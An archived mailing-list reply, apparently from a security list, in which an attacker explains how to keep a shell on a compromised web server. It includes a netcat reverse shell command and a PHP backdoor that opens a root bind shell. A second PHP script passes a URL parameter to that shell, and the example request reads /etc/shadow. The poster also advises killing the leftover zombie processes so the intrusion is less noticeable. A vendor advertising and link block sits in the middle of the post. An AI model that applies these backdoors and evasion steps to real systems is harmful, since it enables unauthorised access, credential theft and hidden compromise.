Re: perl/php connect-back backdoor?

Hi,

I've been using this technique for a while. If you can upload a php or a perl file which gets executed in the server context you already won, regardless of firewall rules. The obvious method is the connect back(i.e nc -e /bin/sh x.x.x.x 80 as that's the likelly allowed outbound port). If that's a no go, and there's absolutelly no way to estabilish a session, you still win.

Consider this:
<?

   `exploit which gets root and calls nc -e /bin/sh -l -p 9999`
?>

then another script:
<?

   $z = `echo $x | nc localhost 999`;
   $z=str_replace("\n", "<br>", $z);
   echo $z;
?>

As is obvious, call the second script and you have somehwat of a crippled root shell.

www.target.com/script2.php?x=cat /etc/shadow

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

you get the point :P

PS: the silly thing about this is that each command you execute this way ends up as a zombie process. In a few minutes of working with this "shell" you'll have hundreds of zombie processes on the target machine. What i like to do is run zkill (zkill.c google it) slightly modified to terminate all zombies.  This way it's less obvious that something very odd is going on.

• Knud_Erik_Højgaard <kain@ircop.dk> wrote:
  > Ingram wrote:
  

  ---